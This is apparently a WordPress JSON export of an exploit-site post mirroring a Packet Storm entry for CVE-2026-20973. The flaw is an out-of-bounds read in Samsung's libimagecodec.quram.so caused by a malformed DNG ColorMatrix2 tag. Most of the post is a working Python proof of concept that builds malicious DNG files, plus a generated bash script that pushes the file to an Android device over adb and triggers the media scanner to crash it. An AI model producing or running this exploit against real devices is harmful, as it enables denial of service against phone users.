{"id":41398,"date":"2026-02-18T11:48:38","date_gmt":"2026-02-18T11:48:38","guid":{"rendered":"http:\/\/localhost\/?p=41398"},"modified":"2026-02-18T11:48:38","modified_gmt":"2026-02-18T11:48:38","slug":"samsung-malformed-dng-colormatrix2-out-of-bounds-read","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=41398","title":{"rendered":"\ud83d\udcc4 Samsung Malformed DNG ColorMatrix2 Out-Of-Bounds Read_PACKETSTORM:215820"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-18T17:33:12&#8243;,&#8221;description&#8221;:&#8221;A memory safety vulnerability was identified in Samsung\u2019s image decoding library libimagecodec.quram.so, affecting the handling of DNG Digital Negative image files. The issue stems from improper bounds validation when parsing the ColorMatrix2 0xC622&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-02-18T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-02-18T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 Samsung Malformed DNG ColorMatrix2 Out-Of-Bounds Read&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:215820&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-20973&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : Samsung libimagecodec.quram.so Out-of-Bounds Read via Malformed DNG ColorMatrix2                                            |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.3 (64 bits)                                                            |\\n    | # Vendor    : https:\/\/www.samsung.com\/us\/                                                                                                 |\\n    =============================================================================================================================================\\n    \\n    [+] Summary    : A memory safety vulnerability was identified in Samsung\u2019s image decoding library libimagecodec.quram.so, affecting the handling of DNG (Digital Negative) image files.\\n                     The issue stems from improper bounds validation when parsing the ColorMatrix2 (0xC622) tag within DNG metadata.\\n                     By supplying a crafted DNG file containing a malformed ColorMatrix2 tag with an unexpected number of entries, the library incorrectly derives the number of color \\n    \\t\\t\\t\\t planes and subsequently performs memory access beyond the allocated buffer. This results in an Out-of-Bounds Read, leading to a process crash (SIGSEGV) during image parsing.\\n    \\t\\t\\t\\t The vulnerability can be triggered automatically through the Android Media Scanner or manually by opening the malicious DNG file in gallery applications, \\n    \\t\\t\\t\\t without requiring user interaction beyond file presence.\\n                     While the observed impact is a denial of service, the flaw represents a broader risk class associated with unsafe metadata parsing in privileged media components.\\n                     Samsung addressed this issue in the January 2026 security update\\n      \\n    [+] POC :   \\n    \\n    #!\/usr\/bin\/env python3\\n    \\n    import struct\\n    import os\\n    \\n    def create_malicious_dng(filename=\\&#8221;poc.dng\\&#8221;):\\n        \\&#8221;\\&#8221;\\&#8221;\\n        Creates a malicious DNG file that causes the Samsung library to crash\\n        \\&#8221;\\&#8221;\\&#8221;\\n        data = bytearray()\\n        data += b&#8217;II&#8217;         \\n        data += struct.pack(&#8216;\\u003cH&#8217;, 42) \\n        data += struct.pack(&#8216;\\u003cI&#8217;, 8)   \\n        ifd0_offset = len(data)\\n        data += struct.pack(&#8216;\\u003cH&#8217;, 13)  \\n        data += struct.pack(&#8216;\\u003cHHII&#8217;, 0x00FE, 4, 1, 0)\\n        data += struct.pack(&#8216;\\u003cHHII&#8217;, 0x0100, 4, 1, 400)\\n        data += struct.pack(&#8216;\\u003cHHII&#8217;, 0x0101, 4, 1, 400)\\n        data += struct.pack(&#8216;\\u003cHHII&#8217;, 0x0102, 3, 1, 0x10)\\n        data += struct.pack(&#8216;\\u003cHHII&#8217;, 0x0106, 3, 1, 32803)\\n        make_data = b\\&#8221;External\\\\x00\\&#8221;\\n        data += struct.pack(&#8216;\\u003cHHII&#8217;, 0x010F, 2, len(make_data), 0xAA)\\n        data += struct.pack(&#8216;\\u003cHHII&#8217;, 0x0111, 4, 400, 0xB2)\\n        data += struct.pack(&#8216;\\u003cHHII&#8217;, 0x0116, 4, 1, 1)\\n        data += struct.pack(&#8216;\\u003cHHII&#8217;, 0x0117, 4, 400, 0x6F2)\\n        data += struct.pack(&#8216;\\u003cHHII&#8217;, 0x828D, 1, 2, 0x202)\\n        data += struct.pack(&#8216;\\u003cHHII&#8217;, 0x828E, 1, 4, 0x10001)\\n        data += struct.pack(&#8216;\\u003cHHII&#8217;, 0xC612, 1, 4, 0x4010000)\\n        data += struct.pack(&#8216;\\u003cHHII&#8217;, 0xC622, 9, 6, 0xD32)\\n        data += struct.pack(&#8216;\\u003cI&#8217;, 0)\\n        data[0x10:0x10] = struct.pack(&#8216;\\u003cH&#8217;, 16)\\n        data[0xAA:0xAA] = make_data\\n        strip_offsets = b&#8221;\\n        for i in range(400):\\n            strip_offsets += struct.pack(&#8216;\\u003cI&#8217;, i * 800)  \\n        data[0xB2:0xB2] = strip_offsets\\n        data[0x202:0x202] = b&#8217;\\\\x02\\\\x02&#8217;\\n        data[0x10001:0x10001] = b&#8217;\\\\x01\\\\x00\\\\x01\\\\x00&#8217;\\n        data[0x4010000:0x4010000] = b&#8217;\\\\x01\\\\x04\\\\x00\\\\x00&#8217;\\n        color_matrix = b&#8221;\\n        for i in range(6):\\n            color_matrix += struct.pack(&#8216;\\u003ci&#8217;, 1000 + i)  \\n        data[0xD32:0xD32] = color_matrix\\n    \\n        strip_counts = b&#8221;\\n        for i in range(400):\\n            strip_counts += struct.pack(&#8216;\\u003cI&#8217;, 800) \\n        data[0x6F2:0x6F2] = strip_counts\\n        fake_pixel_data = b&#8217;\\\\x00&#8242; * 320000  \\n        data.extend(fake_pixel_data)\\n        with open(filename, &#8216;wb&#8217;) as f:\\n            f.write(data)\\n        \\n        print(f\\&#8221;[+] Malicious DNG file created: {filename}\\&#8221;)\\n        print(f\\&#8221;[+] Size: {len(data)} bytes\\&#8221;)\\n        \\n        return filename\\n    \\n    def create_trigger_script():\\n        \\&#8221;\\&#8221;\\&#8221;\\n        Creates a script to trigger the vulnerability on the device\\n        \\&#8221;\\&#8221;\\&#8221;\\n        script = \\&#8221;\\&#8221;\\&#8221;#!\/bin\/bash\\n    echo \\&#8221;[*] Sending malicious DNG file to device&#8230;\\&#8221;\\n    adb push poc.dng \/storage\/emulated\/0\/DCIM\/\\n    \\n    echo \\&#8221;[*] Triggering Media Scanner scan&#8230;\\&#8221;\\n    adb shell am broadcast -a android.intent.action.MEDIA_SCANNER_SCAN_FILE -d file:\/\/\/storage\/emulated\/0\/DCIM\/poc.dng\\n    \\n    echo \\&#8221;[*] To monitor the crash, run:\\&#8221;\\n    echo \\&#8221;    adb logcat | grep -A 20 -B 5 &#8216;SIGSEGV&#8217;\\&#8221;\\n    echo \\&#8221;    adb logcat | grep -A 30 &#8216;Fatal signal&#8217;\\&#8221;\\n    echo \\&#8221;\\&#8221;\\n    echo \\&#8221;[*] Or open the file manually in the Gallery app\\&#8221;\\n        \\&#8221;\\&#8221;\\&#8221;\\n        \\n        with open(\\&#8221;trigger_exploit.sh\\&#8221;, \\&#8221;w\\&#8221;) as f:\\n            f.write(script)\\n        \\n        os.chmod(\\&#8221;trigger_exploit.sh\\&#8221;, 0o755)\\n        print(\\&#8221;[+] Execution script created: trigger_exploit.sh\\&#8221;)\\n    \\n    def create_simple_poc():\\n        \\&#8221;\\&#8221;\\&#8221;\\n        A very simplified version of the malicious file\\n        \\&#8221;\\&#8221;\\&#8221;\\n        poc = bytearray()\\n        poc += b&#8217;II&#8217; + struct.pack(&#8216;\\u003cH&#8217;, 42) + struct.pack(&#8216;\\u003cI&#8217;, 8)\\n        ifd_offset = len(poc)\\n        poc += struct.pack(&#8216;\\u003cH&#8217;, 8)\\n        poc += struct.pack(&#8216;\\u003cHHII&#8217;, 0x0100, 4, 1, 400)  \\n        poc += struct.pack(&#8216;\\u003cHHII&#8217;, 0x0101, 4, 1, 400)\\n        poc += struct.pack(&#8216;\\u003cHHII&#8217;, 0x0102, 3, 1, 16)   \\n        poc += struct.pack(&#8216;\\u003cHHII&#8217;, 0x0106, 3, 1, 32803) \\n        poc += struct.pack(&#8216;\\u003cHHII&#8217;, 0x0116, 4, 1, 1)\\n        poc += struct.pack(&#8216;\\u003cHHII&#8217;, 0x0117, 4, 400, 0x100)\\n        poc += struct.pack(&#8216;\\u003cHHII&#8217;, 0xC612, 1, 4, 0x200)\\n        poc += struct.pack(&#8216;\\u003cHHII&#8217;, 0xC622, 9, 6, 0x300)\\n        poc += struct.pack(&#8216;\\u003cI&#8217;, 0)\\n        poc.extend(b&#8217;\\\\x00&#8242; * 0x300)  \\n        for i in range(6):\\n            poc += struct.pack(&#8216;\\u003ci&#8217;, 0x1000 + i)\\n        poc[0x200:0x200] = b&#8217;\\\\x01\\\\x04\\\\x00\\\\x00&#8217;\\n        poc[0x100:0x100] = b&#8217;\\\\x00\\\\x00\\\\x03\\\\x20&#8242; * 400  # 800 per strip\\n        \\n        with open(\\&#8221;simple_poc.dng\\&#8221;, \\&#8221;wb\\&#8221;) as f:\\n            f.write(poc)\\n        \\n        print(\\&#8221;[+] Simplified file created: simple_poc.dng\\&#8221;)\\n        print(\\&#8221;[!] This file might not work on all devices\\&#8221;)\\n    \\n    def main():\\n        print(\\&#8221;=\\&#8221; * 60)\\n        print(\\&#8221;PoC for Samsung libimagecodec.quram.so &#8211; CVE-2026-20973\\&#8221;)\\n        print(\\&#8221;=\\&#8221; * 60)\\n        print()\\n        print(\\&#8221;[1] Create full malicious DNG file\\&#8221;)\\n        print(\\&#8221;[2] Create simplified DNG file\\&#8221;)\\n        print(\\&#8221;[3] Create execution script\\&#8221;)\\n        print()\\n        \\n        choice = input(\\&#8221;Select option (1\/2\/3): \\&#8221;).strip()\\n        \\n        if choice == \\&#8221;1\\&#8221;:\\n            create_malicious_dng()\\n        elif choice == \\&#8221;2\\&#8221;:\\n            create_simple_poc()\\n        elif choice == \\&#8221;3\\&#8221;:\\n            create_trigger_script()\\n        else:\\n            print(\\&#8221;[!] Invalid option\\&#8221;)\\n        \\n        print()\\n        print(\\&#8221;=\\&#8221; * 60)\\n        print(\\&#8221;Notes:\\&#8221;)\\n        print(\\&#8221;- Vulnerability patched in January 2026 update\\&#8221;)\\n        print(\\&#8221;- CVE number: CVE-2026-20973\\&#8221;)\\n        print(\\&#8221;- For educational and security research purposes only!\\&#8221;)\\n        print(\\&#8221;=\\&#8221; * 60)\\n    \\n    if __name__ == \\&#8221;__main__\\&#8221;:\\n        main()\\n    \\t\\n    Greetings to :======================================================================\\n    jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|\\n    ====================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/215820&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9.1,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:N\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/215820\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-02-18T17:33:12&#8243;,&#8221;description&#8221;:&#8221;A memory safety vulnerability was identified in Samsung\u2019s image decoding library libimagecodec.quram.so, affecting the handling of DNG Digital Negative image files. The issue stems from&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,10,12,13,53,7,11,5],"class_list":["post-41398","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-91","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 Samsung Malformed DNG ColorMatrix2 Out-Of-Bounds Read_PACKETSTORM:215820 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=41398\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Samsung Malformed DNG ColorMatrix2 Out-Of-Bounds Read_PACKETSTORM:215820 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-02-18T17:33:12&#8243;,&#8221;description&#8221;:&#8221;A memory safety vulnerability was identified in Samsung\u2019s image decoding library libimagecodec.quram.so, affecting the handling of DNG Digital Negative image files. The issue stems from...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=41398\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-02-18T11:48:38+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41398#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41398\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Samsung Malformed DNG ColorMatrix2 Out-Of-Bounds Read_PACKETSTORM:215820\",\"datePublished\":\"2026-02-18T11:48:38+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41398\"},\"wordCount\":1160,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.1\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41398#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41398\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41398\",\"name\":\"\ud83d\udcc4 Samsung Malformed DNG ColorMatrix2 Out-Of-Bounds Read_PACKETSTORM:215820 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-02-18T11:48:38+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41398#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=41398\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=41398#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Samsung Malformed DNG ColorMatrix2 Out-Of-Bounds Read_PACKETSTORM:215820\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Samsung Malformed DNG ColorMatrix2 Out-Of-Bounds Read_PACKETSTORM:215820 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=41398","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Samsung Malformed DNG ColorMatrix2 Out-Of-Bounds Read_PACKETSTORM:215820 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-02-18T17:33:12&#8243;,&#8221;description&#8221;:&#8221;A memory safety vulnerability was identified in Samsung\u2019s image decoding library libimagecodec.quram.so, affecting the handling of DNG Digital Negative image files. The issue stems from...","og_url":"https:\/\/zero.redgem.net\/?p=41398","og_site_name":"zero redgem","article_published_time":"2026-02-18T11:48:38+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=41398#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=41398"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Samsung Malformed DNG ColorMatrix2 Out-Of-Bounds Read_PACKETSTORM:215820","datePublished":"2026-02-18T11:48:38+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=41398"},"wordCount":1160,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.1","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=41398#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=41398","url":"https:\/\/zero.redgem.net\/?p=41398","name":"\ud83d\udcc4 Samsung Malformed DNG ColorMatrix2 Out-Of-Bounds Read_PACKETSTORM:215820 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-02-18T11:48:38+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=41398#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=41398"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=41398#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Samsung Malformed DNG ColorMatrix2 Out-Of-Bounds Read_PACKETSTORM:215820"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41398","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=41398"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/41398\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=41398"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=41398"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=41398"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}